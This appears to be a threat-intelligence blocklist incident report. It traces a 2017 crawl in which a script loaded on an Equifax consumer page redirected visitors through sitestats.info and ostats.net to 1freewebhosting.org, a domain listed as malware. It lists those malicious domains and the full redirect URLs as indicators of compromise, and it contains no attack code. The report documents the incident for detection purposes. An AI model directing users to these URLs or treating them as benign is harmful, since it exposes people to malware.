Blocklist Incident - Reputation Match by Domain - ostats.net leads to 1freewebhosting.org

Summary

Correlation: Reputation
Matched By: Domain
Matched Lists: RiskIQ Malware List
Score: 21
Description: riq.auto.model.scam REP host matched '1freewebhosting.org',riq.auto.model.malware REP host matched '1freewebhosting.org'

Incident Details

Id: 304821618
Incident Date: 2017-09-15 10:16 PM PDT
Cause: meta.refresh
Blocklist Resource IP: 209.239.120.72
Blocklist Resource AS: AS30083: Country: US  Registry: arin
SERVER4YOU - server4you Inc., US
Phishing: false
Scam: false
Malware: true
Spam: false
PUP: false
Redir: false
Inject: false
Alexa Rank: 2147483647
Ad Type: Display
Publisher Ad Network: Akamai Technologies, Inc.
Delivering Ad Network: Akamai Technologies, Inc.
Drive-By Malvertisement: false

RiskIQ Malware List Details

Item ID: 44384258
URL: http://1freewebhosting.org
Source: RiskIQ
Match Type: Host
Description: riq.auto.model.malware REP host matched '1freewebhosting.org'
Score: 21
Target Brand:
First Detected At: 2017-02-03 12:38:38.0
First Found On Crawl: 4938829714

Blocklist Resource Details

URL: http://1freewebhosting.org/
Sequence: 9
Response Code: 200
Content Type: text/html
Referrer: https://ostats.net/?s=bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%2FmQKK%2FiWX1OA0zjNfIK9NgnaMOa73pEj%2F8kgDDR6dZJ1bXXBAINA%3D%3D&src=YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t
Cause: meta.refresh
Location in Prior

Cause Page

Sequence in Crawl: 1
Guid: ec96e2ed-f368-4a18-91a8-9c440bbced93
URL: https://ostats.net/?s=bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%2FmQKK%2FiWX1OA0zjNfIK9NgnaMOa73pEj%2F8kgDDR6dZJ1bXXBAINA%3D%3D&src=YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t
IP Address: 209.126.127.34
Window Name: : TopLevelWindow@6e3cc4c2

Resulting Page

Sequence in Crawl: 1
Guid: 70750834-07c5-4a32-b134-75d2843c799e
URL: http://telgrm.me/
IP Address: 54.72.9.51
Window Name: : TopLevelWindow@6e3cc4c2

Crawl Details

Crawl Guid: 98056038-605e-4a9d-ab78-ed9f90b0a5de
Crawl Date: 2017-09-15 10:16 PM PDT
Frontier URL: https://aa.econsumer.equifax.com
Metro Code: none
Crawled Pages: 1
Error Pages: 0

Source Search

No Source Search Result found.

Sequence Overview

| Sequence | URL | Ad Network | Cause | Response Code | Frame | Window | Parent Window | Lost Referrer | Referrer |
|---|---|---|---|---|---|---|---|---|---|
| 1 | https://aa.econsumer.equifax.com/ | - | topLevelRedirect | 200 | true | true | : TopLevelWindow@6e3cc4c2 | - | |
| 2 | https://aa.econsumer.equifax.com/aad/landing.ehtml | - | meta.refresh | 302 | - | - | : TopLevelWindow@6e3cc4c2 | true | https://aa.econsumer.equifax.c... |
| 3 | https://aa.econsumer.equifax.com/aad/noJavascript.ehtml | - | redirect | 200 | true | true | : TopLevelWindow@6e3cc4c2 | - | |
| 4 | https://aa.econsumer.equifax.com/aad/landing.ehtml | - | form.action | 200 | true | true | : TopLevelWindow@6e3cc4c2 | - | https://aa.econsumer.equifax.c... |
| 5 | https://aa.econsumer.equifax.com/aad/uib/js/fireclick.js | - | script.src | 200 | - | - | : TopLevelWindow@6e3cc4c2 | - | https://aa.econsumer.equifax.c... |
| 6 | https://a248.e.akamai.net/f/248/5462/3h/hints.netflame.cc/se... | Akamai Technologies, Inc. | script.src | 200 | - | - | : TopLevelWindow@6e3cc4c2 | - | https://aa.econsumer.equifax.c... |
| 7 | https://snap.sitestats.info/f/content.php?s=%7B%22s%22:%22bE... | - | script.src | 200 | - | - | : TopLevelWindow@6e3cc4c2 | - | https://aa.econsumer.equifax.c... |
| 8 | https://ostats.net/?s=bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%2Fm... | - | location.refresh | 200 | true | true | : TopLevelWindow@6e3cc4c2 | - | https://aa.econsumer.equifax.c... |
| 9 | http://1freewebhosting.org/ | - | meta.refresh | 200 | true | true | : TopLevelWindow@6e3cc4c2 | true | https://ostats.net/?s=bEMrLJN0... |

Sequence Details

1

https://aa.econsumer.equifax.com/
Referrer:
Cause: topLevelRedirect
Contains Element :

2

https://aa.econsumer.equifax.com/aad/landing.ehtml
Referrer: https://aa.econsumer.equifax.com/
Cause: meta.refresh Path from prior: /html/head/meta/@content
Redirects To :

3

https://aa.econsumer.equifax.com/aad/noJavascript.ehtml
Referrer:
Cause: redirect Path from prior: https://aa.econsumer.equifax.com/aad/noJavascript.ehtml
Contains Element :

4

https://aa.econsumer.equifax.com/aad/landing.ehtml
Referrer: https://aa.econsumer.equifax.com/aad/noJavascript.ehtml
Cause: form.action Path from prior: /*[name()='html']/body/form/@action
Contains Element :

5

https://aa.econsumer.equifax.com/aad/uib/js/fireclick.js
Referrer: https://aa.econsumer.equifax.com/aad/landing.ehtml
Cause: script.src Path from prior: /*[name()='html']/body/div[1]/div/script[2]/@src
Contains Source :

6

https://a248.e.akamai.net/f/248/5462/3h/hints.netflame.cc/service/script/www.annualcreditreport.com
Referrer: https://aa.econsumer.equifax.com/aad/landing.ehtml
Cause: script.src Path from prior: /*[name()='html']/body/div[1]/div/script[3]/@src
Contains Source :

7

https://snap.sitestats.info/f/content.php?s=%7B%22s%22:%22bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%252FmQKK%252FiWX1OA0zjNfIK9NgnaMOa73pEj%252F8kgDDR6dZJ1bXXBAINA%253D%253D%22,%22d%22:%7B%22rf%22:%22YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t%22,%22src%22:%22YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t%22%7D%7D
Referrer: https://aa.econsumer.equifax.com/aad/landing.ehtml
Cause: script.src Path from prior: /*[name()='html']/head/script[1]/@src
Changes Window Location To :

8

https://ostats.net/?s=bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%2FmQKK%2FiWX1OA0zjNfIK9NgnaMOa73pEj%2F8kgDDR6dZJ1bXXBAINA%3D%3D&src=YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t
Referrer: https://aa.econsumer.equifax.com/aad/landing.ehtml
Cause: location.refresh Path from prior: /html/head/script[1]
Contains Element :

9

http://1freewebhosting.org/
Referrer: https://ostats.net/?s=bEMrLJN0z55sKQa4DQroerNX71gE3b9aZY%2FmQKK%2FiWX1OA0zjNfIK9NgnaMOa73pEj%2F8kgDDR6dZJ1bXXBAINA%3D%3D&src=YWEuZWNvbnN1bWVyLmVxdWlmYXguY29t
Cause: meta.refresh Path from prior: /html/head/meta/@content